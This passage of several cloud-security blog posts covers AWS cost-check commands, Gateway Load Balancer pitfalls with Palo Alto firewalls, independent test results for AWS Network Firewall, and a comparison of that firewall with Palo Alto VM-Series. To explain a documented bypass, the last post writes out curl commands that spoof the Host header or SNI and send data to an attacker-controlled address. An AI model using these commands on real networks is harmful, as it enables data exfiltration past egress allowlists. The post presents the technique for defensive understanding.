  --start-time $(date -u -d '14 days ago' +%Y-%m-%dT%H:%M:%S) \
  --end-time $(date -u +%Y-%m-%dT%H:%M:%S) \
  --period 86400 \
  --statistics Average \
  --output table

Check for zero-connection databases:

aws cloudwatch get-metric-statistics \
  --namespace AWS/RDS \
  --metric-name DatabaseConnections \
  --dimensions Name=DBInstanceIdentifier,Value=my-database \
  --start-time $(date -u -d '7 days ago' +%Y-%m-%dT%H:%M:%S) \
  --end-time $(date -u +%Y-%m-%dT%H:%M:%S) \
  --period 3600 \
  --statistics Maximum \
  --output table

Prevent with Terraform:

resource "aws_db_instance" "main" {
  instance_class    = var.environment == "prod" ? "db.r6g.large" : "db.t4g.micro"
  multi_az          = var.environment == "prod"
  allocated_storage = var.environment == "prod" ? 100 : 20
  storage_type      = "gp3"
}

Environment-aware sizing. Dev gets the minimum, production gets what it needs. No more copying production configs into staging and forgetting about it.

The pattern behind all five

You've probably noticed a key problem? Most of these topics don't apply to startups or small businesses that watch every cent twice. They apply to large companies. You know what's worse? That these large companies often look for savings on staffing in difficult times, not even on the things I mentioned. Nobody seems to pay attention to that. You know why? Because the staff has shrunk...

And it's not like I see this everywhere. Usually, the teams I work with are really well-equipped with AWS. It's just that there's a real shortage of resources to devote to cost optimization in the cloud.

What to do about it

Simply take these ready-made commands and run them on your environment. It'll take you maybe 10 minutes, and you might save someone or yourself a full-time job.

If you want to go deeper into the topic - identify over-allocated computing resources, audit data transfer patterns, check liability coverage - that's a longer conversation. But start with these five. They can be checked for free, and most can be fixed for free.

I built cloud-audit to automate the security side of these checks - it runs 30+ checks in ~12 seconds. For cost specifically, the five CLI commands above are your starting point.

Originally published at haitmg.pl

GWLB in Production: 9 Pitfalls That Break Your Firewall Architecture

Mariusz Gębala — Tue, 10 Mar 2026 13:30:22 +0000

As a Cloud Engineer, I have frequently implemented solutions for clients that enhance both network and application security in their infrastructures. One of the most frequently used solutions was the selection of Palo Alto VM-Series firewalls, specifically designed for public clouds. Implementing VM-Series, however, isn't as straightforward as it sounds in theory. To achieve a truly functional infrastructure, many other resources must be deployed around the firewalls themselves. Take AWS, for example. One of the most popular solutions is the use of a Gateway Load Balancer (in fact, this is one of the reasons this type of Load Balancer was implemented at AWS). Choosing GWLB, however, implies other dependencies, such as Gateway Load Balancer Endpoints, which should be located in dedicated subnets, and therefore, the routing tables should also be set up correctly in each of these subnets. Ultimately, it turns out that it's best to encapsulate the security portion of the infrastructure within a dedicated VPC. But since these are separate VPCs, they need to be connected to other Virtual Private Networks somehow so that this traffic is actually filtered and examined by firewalls. This is where Transit Gateway comes in.

As you can see, simply gathering dependencies is no easy task, let alone configuring them. In this article, I'd like to focus on a few key aspects that can save you time if you choose this architecture. I've implemented this solution numerous times for clients across various industries. As I walk through the configuration process, I'll describe some not-so-typical issues, but ones that might give you a few extra gray hairs.

The architecture

Before diving into the pitfalls, here's the centralized inspection architecture this article is about:

Click the diagram to open full-size in a new tab — route table details are readable at full resolution.

1. Asymmetric traffic forwarding without TGW Appliance Mode

We're considering a scenario where we implement our solution in a centralized architecture. The Transit Gateway is responsible for sending traffic between VPCs. Now let's imagine this situation (let's trace the packet flow together).

A virtual machine (let's call it app_vm) in Spoke VPC attempts to send a packet to a second virtual machine in another Spoke VPC (let's call it db_vm). app_vm is located in AZ A, db_vm is located in AZ B. Here's what happens:

app_vm initiates a connection. It checks the routing table in its subnet, which states that every packet destined for the 172.16.0.0/16 subnet is sent to the Transit Gateway.
Transit Gateway receives the packet from the VPC where app_vm is located. It checks the routing table associated with that VPC. The routing table clearly states: send this packet to Security VPC.
Transit Gateway forwards the packet to Security VPC. And here's a very important point that will have consequences later. Due to AZ affinity (TGW's default behavior - it sends traffic to the same AZ the packet originated from), the packet is sent to the Transit Gateway Attachment subnet in AZ A.
The Transit Gateway Attachment subnet in AZ A receives the packet and forwards it to the Gateway Load Balancer Endpoint, also in AZ A.
The packet reaches the Gateway Load Balancer and is then forwarded to the VM-Series in AZ A.
Policies configured on the firewall allow the packet to pass through, so the packet is sent to the Gateway Load Balancer Endpoint subnet (AZ A) and then to the Transit Gateway.
The Transit Gateway receives the packet from the Security VPC and forwards it based on the routing table to the Spoke VPC where db_vm is located. The packet reaches the destination machine.

Sounds good, right? Now let's trace the return traffic.

db_vm responds to the request received from app_vm. It checks the routing table in its subnet, which says that a packet destined for 192.168.0.0/24 should be sent to the Transit Gateway. It does so.
The Transit Gateway receives this packet, checks the routing table, and forwards it to the Security VPC.
This is the key moment. Due to the same AZ affinity mechanism, the Transit Gateway sends this packet to the Transit Gateway Attachment subnet in AZ B - because db_vm is in AZ B. This is not random - TGW deterministically picks the AZ based on where the packet entered.
The packet is forwarded to the Gateway Load Balancer Endpoint in the subnet in AZ B. The packet is then forwarded to the Gateway Load Balancer, which forwards it to the VM-Series in AZ B.
The VM-Series in AZ B receives the packet and thinks, "What is this? I have no idea what this session is about."
DROP.

Fortunately, solving this problem is incredibly simple (but only if you understand the problem). In the Transit Gateway VPC attachment configuration, simply enable the Appliance Mode option. This changes TGW's forwarding logic from AZ affinity to a flow hash based on the 4-tuple (source IP, destination IP, source port, destination port) - ensuring both directions of a flow are always delivered to the same AZ in the Security VPC. This option is not enabled by default.

Sources: AWS Docs: Transit Gateway Appliance Mode, AWS Prescriptive Guidance: Transit Gateway asymmetric routing

2. Fail-open when all targets are unhealthy

Imagine an extremely rare, but still possible, situation. All your firewalls in all AZs in your Security VPC become inoperable for some reason. The Target Group associated with GWLB sees them all as unhealthy. What comes to mind first? That GWLB will drop traffic and not forward it to unhealthy instances. This seems logical, but it's a shame it's not true.

GWLB will go into fail-open mode. What does this mean for you? It depends. If the firewall is in a crashed or terminated status, the traffic will indeed stop at the firewall and be dropped. However, if the firewall is in an up state but health checks fail (e.g., due to a CPU spike, a license expiry, or a bad Panorama push), the firewall can let this traffic through without inspection. This is a real security bypass.

How can you protect against this? There are several options.

Configuring alerts on CloudWatch for UnHealthyHostCount is a must - so you're at least aware that there might be a threat.
Configuring target_failover.on_unhealthy to rebalance will rehash flows to healthy targets. Note that this helps when some targets are unhealthy - if all targets are down, there's nowhere to rebalance to.
A great, though slightly more advanced, solution is to use a Lambda-based kill switch. If such a situation occurs, the function should modify the routing tables to blackhole traffic.

Sources: AWS Docs: Health checks for GWLB target groups, AWS Whitepaper: GWLB with TGW for centralized security

3. The real cost stack

It's generally accepted that the price for GWLB is around $0.014 per hour per AZ. Well, that's true, but that's just GWLB. The table lists all the ACTUAL costs:

Component	Cost basis	3-AZ, 2 FW/AZ, 1TB/mo
GWLB hourly	$0.014/AZ-hour	$31
GWLB usage (GLCU)	$0.004/GLCU-hour	~$50
GWLBE hourly (PrivateLink)	$0.011/hour per endpoint	$24
GWLBE data processing	$0.01/GB	$10
Cross-AZ data transfer	$0.01/GB each direction	$20
TGW attachment	$0.07/hour per attachment	$153
TGW data processing	$0.02/GB	$20
EC2 instances (6x c5n.xlarge)	~$0.34/h per instance	$1,489
Subtotal (infra only)		~$1,797/mo
VM-Series PAYG license	$1.71/h per instance	$7,490
Total with PAYG		~$9,287/mo
VM-Series BYOL license (amortized)	varies	~$2,400-3,600
Total with BYOL		~$4,197-5,397/mo

As you can see, your monthly invoice doesn't include just the GWLB itself. You budgeted around $500, and at the end of the month, you receive an invoice for ~$9,000 (depending on the region). Consider an alternative - perhaps a native AWS firewall will suffice for your needs, costing around $750 per month. (But of course, this also cuts out many features - I described this in more detail in this article.)

And another "pleasant" surprise: if you configure cross-zone load balancing on GWLB, remember that you pay $0.01/GB for each cross-AZ hop. This option is worth considering when planning your HA architecture.

Sources: AWS ELB Pricing, AWS PrivateLink Pricing

4. Palo Alto overlay routing - not a silver bullet

Overlay Routing in VM-Series can be a great solution. We don't need to create separate NAT Gateways native to AWS; traffic to the internet exits directly through the firewall's public interface. And that's all great, but this configuration will only work for outbound traffic.

What about inbound traffic? The firewall will inspect the packet, apply overlay routing, and instead of returning the packet back through the GWLB endpoint, it will send it out through its public interface. The result - asymmetric routing and dropped connections.

East-west traffic (VPC-to-VPC) in a centralized TGW architecture is a different story - it actually works fine with overlay routing. The packets have private destination IPs, so the firewall's L3 lookup routes them back via the GENEVE interface, not out the public interface.

But there are solutions for combined traffic too.

First and foremost, consider whether you really need overlay routing. If it's only going to inspect outbound traffic, then yes, it's a shame not to take advantage of this option.

If you need inbound traffic handling but don't want to give up overlay routing, don't worry. You'll need to spend a bit more time on configuring subinterfaces and virtual routers, but it can be done while maintaining full functionality.

One more thing worth mentioning - there was a confirmed bug (PAN-229985, fixed in PAN-OS 11.1.3) where GWLB overlay routing packets were re-encapsulated with an incorrect flow cookie in the GENEVE header. Some of the issues reported on LIVEcommunity may have been caused by this bug rather than an architectural limitation. Make sure you're running a version with this fix.

Finally, before you decide to deploy this solution to production, test it in a test environment.

Sources: Palo Alto: Enable Overlay Routing for VM-Series on AWS, LIVEcommunity: Overlay Routing with GWLB for Combined Model (SOLVED), LIVEcommunity: Issues with Overlay Routing and GWLB

5. PAN-OS version roulette

Remember - there's no operating system in the world that's bug-free. PAN-OS is no exception. Some versions of PAN-OS have problems coexisting with GWLB, particularly when overlay routing is enabled:

PAN-OS Version	GWLB Status
10.1.5-h5	Working
10.1.6	Broken (fix in 10.1.6-h6)
10.1.7	Working
10.2.2	Broken
10.2.3-h2	Issues reported
11.0.0 (EOL)	Issues reported

We usually assume that the newer version will be better than the previous one. We decide to upgrade (because who would test anyway...). Well, we updated our version to the latest one and... something's not right. Gateway Load Balancer Endpoints don't work, but they don't show any errors either.

The solution is brutally simple, but many users seem to forget this. TEST the new PAN-OS version in a non-production environment. Don't go straight to production with untested software. When you buy new running shoes, do you immediately wear them in the most important race of your life, or do you test them during training sessions to make sure they really suit you?

Sources: LIVEcommunity: Overlay Routing + GWLB issues, LIVEcommunity: GWLB VPC Endpoint broken post-upgrade

6. NAT on the firewall breaks traffic

Are you an administrator managing firewalls at your on-prem location and have been tasked with deploying VM-Series in the cloud? I'd bet your intuition (and probably rightly so) tells you that one of the most important configurations will be the correct NAT settings on the firewalls. You apply the same pattern to the Cloud Firewall with GWLB and... it doesn't work? No wonder.

GWLB validates the 5-tuple of return packets against its connection state table. If you've set up DNAT on the firewall, the 5-tuple no longer matches, so GWLB will drop the packet. But don't make it too easy - you won't get a clear error (and forget about the logs).

When using GWLB, you don't need to NAT on the VM-Series. If you carefully examine the architecture (the one at the beginning of the article), you'll notice that using a NAT Gateway is enough to handle outbound traffic. Unless you're using overlay routing (see section 4), in which case the firewall handles outbound NAT directly.

Sources: AWS re:Post: NAT on Palo FW with GWLB, AWS Best practices for GWLB

7. The debugging nightmare

Gateway Load Balancer is a brilliant AWS solution... but not for debugging traffic problems.

Colloquially speaking, even VPC Flow Logs won't help here. The problem is that GWLB encapsulates traffic with the GENEVE protocol on UDP port 6081. Instead of the actual source and destination addresses, you'll see some private addressing that tells you nothing.

Make one mistake in any routing table and you're in... a black hole. Look at the architecture diagram to see how many routing tables appear in the VPC itself (and add the corresponding routing tables in TGW, in the Spoke VPCs). You have to be careful, and honestly, I don't have a silver bullet.

What can help?

Flow Logs on Gateway Load Balancer Endpoint interface with custom fields: ${pkt-srcaddr}, ${pkt-dstaddr}, ${flow-direction}, ${tcp-flags}
Logs directly on VM-Series
AWS Reachability Analyzer
Simultaneous tcpdump on client, server, and firewall interfaces

8. One Security VPC or two?

If you need to inspect both east-west (VPC-to-VPC) and north-south (internet ingress/egress) traffic, you might wonder whether one Security VPC is enough.

The good news - a single Security VPC with Appliance Mode ON works for both traffic types. North-south traffic is not broken by Appliance Mode. For internet-bound traffic (where the destination has no AZ), TGW with Appliance Mode selects the ENI in the source AZ anyway - so it behaves almost identically to the default AZ affinity.

So why do some AWS guides recommend two separate Security VPCs? The answer is resilience, not cost (TGW cross-AZ data transfer has been free since April 2022). With Appliance Mode ON, TGW uses a flow hash that can send traffic from a healthy AZ to appliances in an impaired AZ. With Appliance Mode OFF, AZ affinity isolates the blast radius - if AZ1 goes down, AZ2 traffic continues unaffected.

In practice, there are three options:

One Security VPC with Appliance Mode ON - works for both E-W and N-S. Simpler to manage, accepts the resilience trade-off. This is what most deployments use.
Two Security VPCs - one for E-W (Appliance Mode ON), one for N-S (Appliance Mode OFF). Maximum AZ isolation, but double the infrastructure and operational overhead.
One Security VPC with Appliance Mode OFF - breaks east-west inspection. Don't do this.

One more thing to keep in mind: in multi-account setups, AZ names map to different physical zones per account - use AZ IDs (e.g., use1-az1), not names.

Sources: AWS Whitepaper: GWLB with TGW for centralized security, AWS APN Blog: Centralized traffic inspection with GWLB

9. IMDSv2 and bootstrap - check your PAN-OS version

Not all versions of the PAN-OS VM-Series support IMDSv2. When I first encountered this problem, I thought I was going to lose all my hair. The process was standard: set the bootstrap in userdata, everything looked perfect, and... nothing bootstrapped. I scoured the internet for the problem, which turned out to be a single small checkbox in the virtual machine configuration - "Enable IMDSv2." I unchecked it, redeployed it with the same bootstrap - eureka! Everything is working as it should.

That was on an older PAN-OS version. The good news is that Palo Alto has been supporting IMDSv2 since 2022:

BYOL: PAN-OS 10.2.0+ with VM-Series Plugin 3.0.0+
PAYG: PAN-OS 10.2.5+ with Plugin 3.0.0+
Panorama: PAN-OS 10.2.3+

The only thing you need to set is EC2 metadata:

metadata_options {
  http_endpoint = "enabled"
  http_tokens   = "required"
}

Note this if for some reason your bootstrap won't work.

Sources: Palo Alto KB: IMDSv2 support for VM firewall and Panorama in AWS, VM-Series Plugin 3.0.0 Release Notes

So what should you do with all this information?

Generally, do what you feel is right, but I suggest answering a few important questions before implementing:

Is your environment truly sensitive enough to require centralized traffic inspection? Is the data stored in your environment highly sensitive? If you answered yes to both questions, then you need this solution. If you have any doubts, reconsider - maybe a native AWS firewall will suffice?

Do you have experience configuring Palo Alto hardware? Without it, it will be difficult to navigate the initial process without wading through reams of documentation. It's not just the VM-Series configuration itself, but also the AWS configuration at both the network and resource levels. You can always ask Palo Alto for a dedicated specialist, who will handle this for you... But you'll also pay for that.

Consider whether you can afford this solution. It's not a small amount. Go through section 3 again and judge for yourself.

Remember that simply implementing VM-Series in production can be risky. It's good to have at least a minimal test environment to test your configuration before rolling it out to production, as you could shut down your business and not know why.

If you have no doubts about the above and are able to meet all of the above requirements, go for it; this solution is for you.

Building a centralized Security VPC on AWS with GWLB? I've deployed this architecture for enterprise clients and know where the bodies are buried. Let's talk.

AWS Network Firewall blocked 0.59% of exploits in independent testing - what this means for your cloud

Mariusz Gębala — Sun, 08 Mar 2026 20:30:55 +0000

In the spring of 2025, the results of a test comparing cloud firewalls were published on the CyberRatings.org laboratory website. Ten providers were included in the test. The AWS firewall blocked 0.59% of exploits.

When additional bypass tests were applied, the effectiveness dropped to 0%.

In my DevOps career, I have implemented both native AWS firewalls and those from Palo Alto (VM-Series and CNGFW). To this day, some customers still use the AWS firewall. This article is not a criticism; it is a realistic and objective (at least I hope so) look at what these numbers actually mean, what you should do with them, and what to keep in mind if you use the AWS Network Firewall.

Three rounds of testing, same result

First and foremost, it's worth noting: this wasn't a one-time test. CyberRatings tested the AWS firewall three times:

April 2024 - 11 vendors were tested for 984 exploits and 1,645 bypasses. AWS scored 5.39% security effectiveness - the lowest among all tested vendors. The rating was "Caution" (6 vendors received "Recommended," 1 "Neutral," and 4 "Caution").

November 2024 - Minitest. Only native AWS, Azure, and GCP firewalls were considered in the test. AWS achieved a result of 0.38% of blocked exploits (2 out of 522). Their counterparts - Azure 24.14%, GCP 50.57%. Keysight CyPerf v5.0 was used as the test platform.

April 2025 - Firewall Comparison Report for Q1 2025. Ten vendors were tested for 2,028 exploits and 2,500 attacks using 27 techniques. AWS (horror of horrors) 0.59%. After security bypass tests, 0%. For comparison - the largest vendors (Check Point, Fortinet, Juniper, Palo Alto Networks, Versa) from 99.61% to 100%. The differences are dramatic.

Wait - 0% doesn't mean "does nothing"

And here's a moment to pause - 0% doesn't mean the firewall is doing nothing. Before you give up on your AWS firewall, let me explain what these results really mean.

CyberRatings tests exploits and resilience against signature-based vulnerabilities (CVEs) from the last 10 years, which use various techniques to bypass security at layers 3, 4, and 7 of the OSI model. The key is that AWS Firewall wasn't designed as an IPS/IDS system in the traditional sense. It's a resource managed by Suricata with a specific set of features (domain filtering, IP/port rules, and POSSIBLY threat signature management). Its primary purpose is network segmentation and traffic filtering - NOT catching exploits based on the CVE database.

The problem is that AWS sells its firewalls with advertising phrases like "intrusion prevention" and "threat detection." Well, since you're paying for IPS rule groups and just over half a percent of exploits are detected, it's probably a problem, regardless of the design assumptions.

Why such low results? Here's a technical explanation.

In my career, I've worked with both Suricata firewalls and those supporting App-ID. The difference stems from the underlying architecture.

Suricata in AWS NFW

AWS runs Suricata in the background. Suricata is an open-source IPS system, but AWS NFW does not support all of its functionality:

Lua scripts - most advanced Suricata rules use them for complex detection logic
File extraction - no downloading for analysis
iprep - no IP scoring
Datasets/datarep - no custom data matching
IKEv2 and IP-in-IP protocol detection
pcre is limited to working only with content, tls.sni, http.host, and dns.query

This shouldn't be underestimated. Lua scripts alone significantly enhance Suricata's detection. Without them, you're only using a fraction of its capabilities.

Stateful and Stateless Switching Problem

This is the technical cause of the problem identified by CyberRatings.

AWS NFW processes traffic in two stages. First, through the stateless engine (5-tuple matching), and then optionally through the stateful engine (Suricata). Unfortunately, stateless rules have a higher priority and typically interfere with stateful inspection.

Nevertheless, CyberRatings documented that they followed AWS documentation. Furthermore, they hired a certified AWS consultant to configure the firewall and worked directly with AWS engineers. Despite this, they found erroneous switching between engines. AWS Best Practice currently recommends setting the default stateless action to "Forward to Stateful Rule Groups" and completely avoiding configuring stateless rules. Simply put, it's killing half the engine because it's not cooperating with the other half.

Evasion is the real killer

The exploit's 0.59% score is bad. The 0% evasion score is even worse.

CyberRatings tested 2,500 attacks using 27 bypass techniques at Layers 3, 4, and 7. When a firewall fails to handle evasion at lower layers, the score drops dramatically - even if it detects several exploits at first glance. AWS NFW failed bypass tests so badly that it nullified several detected exploits.

AWS has not publicly commented on or disputed the CyberRatings test results.

For context: bypass techniques include things like IP fragmentation, TCP segmentation, and protocol-level obfuscation. These are standard techniques used daily by penetration testers and real attackers. A production-grade firewall must be able to handle them.

It's not just AWS - all three hyperscalers failed

Cloud Provider	Exploit Block Rate	Overall (after evasions)
AWS Network Firewall	0.59%	0%
Azure Firewall	55.28%	0%
GCP Cloud Firewall	96.60%	0%
Third-party average (5 vendors)	99.61-100%	99.61-100%

GCP detected most of the exploits. But what good is that if bypass tests also yielded 0%? Azure is even worse than GCP.

So what's the conclusion? AWS isn't terrible. The problem is that cloud-native firewalls aren't designed as next-generation firewalls (NGFWs). As SDxCentral put it, "first-class cybersecurity firewall services aren't the highest priority for hyperscale cloud providers, whose first orders of business are to store and distribute data and not lose it."

Let's be honest about this. AWS provides the infrastructure, and they sell security features as a bonus. Companies like Palo Alto Networks, Fortinet, and Check Point are strictly security-focused. The priorities are different, and therefore, the results are different.

What are CyberRatings anyway? Is it worth paying attention to them?

This is, contrary to appearances, a very crucial question. Or maybe they're deliberately trying to make AWS look bad? Let's examine their credibility.

CyberRatings.org is a non-profit organization founded in November 2020 by Vikram Phatak. Phatak founded NSS Labs in 2007 and managed it for over a decade - NSS Labs was the industry standard for independent firewall testing before its closure. CyberRatings is currently working with the revived NSS Labs as an official testing partner.

A few controversies: NSS Labs was involved in a legal dispute with CrowdStrike from 2017 to 2018, in which it admitted to "inaccurate" testing of the CrowdStrike Falcon endpoint product and subsequently filed an antitrust lawsuit against CrowdStrike, AMTSO, and several other vendors. The CrowdStrike portion was settled confidentially in 2019; the broader antitrust claims were dismissed by the court. This is a significant story and worth covering.

CyberRatings' AWS NFW testing was self-funded, with no vendor involvement. It used the industry-standard methodology (Keysight CyPerf), and the results were consistent across three separate rounds of testing over a 12-month period. The fact that the company hired a certified AWS consultant and worked directly with AWS engineers makes the "misconfiguration" argument difficult to sustain.

Getting back to AWS Firewall... So what is it really good at?

Despite these test results, I still recommend AWS Network Firewall to clients. Here's why.

Domain-based outbound filtering. If you want to control which domains your workloads can reach, NFW does it well - especially with TLS inspection enabled to prevent SNI spoofing.

Network segmentation. VPC-to-VPC traffic control via Transit Gateway. IP and port-based rules. Basic allow/deny logic. This is exactly what most teams use it for.

Centralized logging. Full visibility of network flows thanks to native CloudWatch and S3 integration.

Zero operational overhead. No patching, no sizing, no HA configuration. It just works.

Compliance checkbox. For many compliance frameworks, having a firewall with logging and rules is a requirement - not a 99% score in an independent IPS test.

Cost. At $0.395/hour per endpoint (or $0.489 with TLS inspection), it's four times cheaper than using Palo Alto VM-Series. And as of February 2026, AWS has eliminated additional data processing fees for advanced inspection.

These are real benefits. For a startup focused on basic outbound filtering or an internal application behind a transit gateway, NFW is the right tool. Just don't confuse it with an IPS system.

So what do third-party firewalls do differently?

The difference between 0.59% and 99.61% isn't due to budget or effort. It's about the architectural approach.

App-ID vs. signatures. Palo Alto's App-ID classifies traffic based on application behavior - payload inspection, behavioral patterns, protocol decoding - regardless of port. The AWS firewall classifies traffic based on port, protocol, and Suricata signatures. These are fundamentally different approaches. App-ID can distinguish legitimate HTTPS from reverse-shell tunneled protocols on port 443. To Suricata, both appear as TLS on port 443.

Full bypass support. Third-party firewalls reassemble fragmented packets, normalize protocols, and handle TCP segmentation before applying detection rules. This is why they withstand bypass tests. This is computationally expensive and causes delays, but that's why you pay $3,000 per month instead of $750.

Continuous signature updates. Palo Alto's threat intelligence team updates signatures daily, addressing new CVEs. AWS managed rule groups update less frequently and include fewer signatures.

One note: third-party firewalls aren't perfect. For example, in CyberRatings' Q4 2025 test, Palo Alto Networks' PA-1410 firewall initially scored 0% in bypass resistance and a mere 46.37% in overall score. However, (credit where credit is due) after updating the Palo Alto operating system to version 11.2.10, its resistance increased to 100% and its overall score to 96.07%. The conclusion is simple: even companies dedicated to security must update their operating systems, and no vendor is always immune to vulnerabilities.

You've confused me... So what should I do?

If you're using AWS Network Firewall, here are my recommendations:

1. Understand what you're actually getting

NFW is a managed traffic filtering service. It's great for domain allow/deny lists, IP rules, and network segmentation. It's not an IPS that will detect known exploits. Adjust your expectations and security architecture accordingly.

2. Enable TLS Inspection

If you haven't already, enable TLS inspection. This costs an additional $0.094/hour per endpoint, but it minimizes the SNI bypass vulnerability and provides real visibility into encrypted traffic.

3. Block QUIC

AWS NFW can't inspect QUIC traffic. HTTP/3 relies on QUIC. Add a stateful rule to block UDP/443 and force clients to fall back to TCP/TLS, where the firewall can actually monitor traffic.

4. Don't use stateless rules

Follow AWS best practices: set the default stateless action to "Forward to stateful rule groups." Don't configure stateless rules - they can interfere with stateful inspection. This is what CyberRatings says breaks the engine.

5. Layered Security

NFW shouldn't be the only layer of security. Combine this with:

GuardDuty for threat detection (behavioral analysis, not signatures)
Security Hub for posture management
WAF against public applications
VPC endpoint policies to restrict access to services
SCPs to prevent misconfigurations at the organizational level

6. If you need a true IPS system, deploy an external NGFW

For regulated industries (PCI-DSS, HIPAA, SOX), environments processing sensitive data, or organizations with active threat models involving targeted attacks, consider deploying an external NGFW on AWS. Check Point, Fortinet, Juniper, Palo Alto, and Versa all achieved scores of 99.61-100% in the same test, running on the same AWS infrastructure.

Interestingly, this doesn't mean you have to abandon NFW. I've actually seen many environments using both solutions. NFW for broad traffic filtering and an external NGFW provider in a centralized VPC for in-depth inspection.

The real question no one asks

The CyberRatings test measures how well a firewall detects known exploits and resists bypassing them. That matters. But it's not the whole picture.

Most AWS security incidents I've seen weren't caused by an attacker exploiting a CVE through the firewall. They were caused by:

Overly permissive IAM policies
S3 buckets with public access
Security groups open to everyone
Access keys that haven't been rotated in 900 days

The 17 checks I perform during every AWS audit reveal more real risk than any firewall result. A team that fixes these fundamental issues and runs AWS NFW with TLS inspection is more secure than a team that deploys Palo Alto VM-Series but leaves its root account without MFA.

Security is a matter of layers. Firewalls are one layer. Don't let the test result make you forget about the others.

Sources

CyberRatings.org, "Q1 2025 Cloud Network Firewall Test Results", April 2025
CyberRatings.org, "Cloud Network Firewall Comparative Test", April 2024
CyberRatings.org, "CSP Native Firewall Test Results", November 2024
CyberScoop, "Independent tests show why orgs should use third-party cloud security services", April 2025
SDxCentral, "Hyperscaler Cloud Firewalls Again Fail to Meet Basic Security Standards", April 2025
SDxCentral, "Is the AWS Network Firewall Safe?", May 2024
CyberRatings.org, "Follow-On Enterprise Firewall Results", 2025
AWS Documentation, "Suricata Limitations"
AWS Documentation, "Firewall Rules Engines"
AWS Documentation, "TLS Inspection Considerations"
AWS, "Network Firewall Pricing"
AWS, "Network Firewall Price Reduction", February 2026
Palo Alto Networks, "App-ID Technology"
Dark Reading, "NSS Labs Admits Falcon Test Inaccurate"

Originally published at haitmg.pl. Running AWS Network Firewall and want to understand your actual security posture? I audit cloud infrastructure for a living - from firewall rules to IAM policies to network architecture. Let's talk.

AWS Network Firewall vs Palo Alto VM-Series - what I learned after deploying both in production

Mariusz Gębala — Fri, 06 Mar 2026 09:42:49 +0000

I've deployed both AWS Network Firewall and Palo Alto VM-Series firewalls in production AWS environments. Security VPC architectures for enterprise clients across automotive, government, and cultural sectors - some with AWS Network Firewall, others with Palo Alto VM-Series behind a Gateway Load Balancer.

This is not a feature matrix from a vendor website. This is what I found after running both, what surprised me, and what you should know before choosing.

The short version

AWS Network Firewall is good enough for most workloads. It's native, managed, and cheap to start with. But it has a documented egress filtering bypass that lets an attacker circumvent your domain allowlist with a single curl command. If you're in a regulated industry or handle sensitive data, you need to understand this before committing.

Palo Alto VM-Series catches things AWS Network Firewall doesn't - but you pay for it in complexity, cost, and operational overhead. It's not a slam dunk either.

Where AWS Network Firewall works well

Let's start with what AWS gets right, because it gets a lot right.

Zero infrastructure to manage. No EC2 instances, no patching, no sizing. You create a firewall, attach it to a VPC, and it works. It scales automatically - there's no capacity planning conversation.

Native integration. Route tables, VPC, Transit Gateway - everything is first-party. No Gateway Load Balancer gymnastics, no GENEVE tunnels to debug. AWS Firewall Manager lets you deploy policies across an entire AWS Organization from a single place.

Suricata under the hood. The stateful engine runs Suricata rules, which means you can use any compatible threat intelligence feed. If your team already knows Suricata, the learning curve is minimal.

Cost for basic use cases. At $0.395/hour per endpoint plus $0.065/GB processed, it's cheaper than VM-Series for low-to-medium traffic volumes. No license fees, no subscriptions.

For a startup running a few services in a single VPC, or an internal application with basic egress filtering, AWS Network Firewall is perfectly adequate.

The egress filtering bypass that changes the conversation

Here's where things get interesting. In September 2023, security researcher Jianjun Huo documented a bypass in AWS Network Firewall's domain-based egress filtering. The vulnerability was also cataloged on Hacking the Cloud, a well-known AWS security research resource.

How it works

AWS Network Firewall uses the Server Name Indication (SNI) extension in TLS handshakes to determine which domain a client is connecting to. When you create a domain allowlist - say, only permit traffic to *.amazonaws.com and updates.example.com - the firewall checks the SNI field against your list.

The problem: the firewall does not verify that the destination IP address actually belongs to the domain declared in the SNI. AWS documentation explicitly states this:

"Network Firewall doesn't pause connections to do out-of-band DNS lookups."

AWS Network Firewall documentation

This means an attacker (or malware) inside your VPC can do this:

# HTTP bypass - spoof the Host header
curl -H "Host: updates.example.com" http://attacker-controlled-ip.com/exfiltrate

# HTTPS bypass - spoof the SNI
curl --resolve "updates.example.com:443:attacker-ip" \
     https://updates.example.com/exfiltrate --insecure

The firewall sees updates.example.com in the SNI, checks it against the allowlist, and lets the traffic through. The actual TCP connection goes to the attacker's IP. Data exfiltrated. Allowlist bypassed.

This is not a theoretical attack. It's a documented technique used in post-exploitation scenarios, and it's closely related to domain fronting - a technique cataloged in the MITRE ATT&CK framework under T1090.004.

The mitigation - and its gaps

AWS added TLS inspection to Network Firewall, and as of early 2025, enabling TLS inspection blocks SNI spoofing by default. When TLS inspection is active, the firewall validates that the server certificate's domain matches the SNI in the client hello. If they don't match, the connection is dropped.

This is good. But it comes with significant caveats:

1. TLS 1.3 Encrypted Client Hello (ECH) and Encrypted SNI (ESNI) are not supported.

From the official AWS documentation:

"Traffic encrypted using TLS v1.3 Encrypted SNI and Encrypted Client Hello extensions aren't supported."

When Network Firewall encounters a client hello without a visible SNI (because it's encrypted), it closes the connection with a RST packet. So you get security - but at the cost of breaking legitimate traffic that uses ECH. As ECH adoption grows (and it is growing - major browsers and CDN providers are rolling it out), this becomes a bigger compatibility problem.

2. QUIC (UDP-based transport) is not inspectable.

HTTP/3 runs over QUIC. AWS Network Firewall cannot inspect QUIC traffic. The recommended workaround? Block UDP/443 entirely and force applications back to TCP. That works, but it's a blunt instrument.

3. TLS inspection adds cost and complexity.

Enabling TLS inspection bumps the endpoint cost from $0.395/hour to $0.489/hour. You also need to deploy and manage CA certificates on every host that sends traffic through the firewall - or accept that you're only inspecting a subset of your traffic.

4. Existing connections are dropped when you enable TLS inspection.

Adding TLS inspection to a running firewall interrupts existing traffic flows. This means you can't just flip it on during business hours.

How Palo Alto handles the same scenario

Palo Alto VM-Series approaches this differently at a fundamental level.

App-ID vs port-based filtering

AWS Network Firewall classifies traffic by port, protocol, and domain (via SNI/Host header). Palo Alto's App-ID classifies traffic by application identity, regardless of port. It inspects packet payloads, analyzes behavioral patterns, and matches traffic against a library of thousands of application signatures.

This means App-ID can tell the difference between "legitimate HTTPS to aws.amazon.com" and "reverse shell tunneled over port 443 pretending to be HTTPS to aws.amazon.com." Port 443 is port 443 to AWS Network Firewall. To Palo Alto, they're two completely different applications.

Built-in domain fronting detection

Starting with PAN-OS 10.2, Palo Alto firewalls with Threat Prevention or Advanced Threat Prevention can detect domain fronting attempts. When the domain in the SNI field differs from the HTTP Host header, the firewall generates a threat log entry with threat ID 86467 (classified as a Spyware signature).

This is exactly the attack that bypasses AWS Network Firewall's domain filtering.

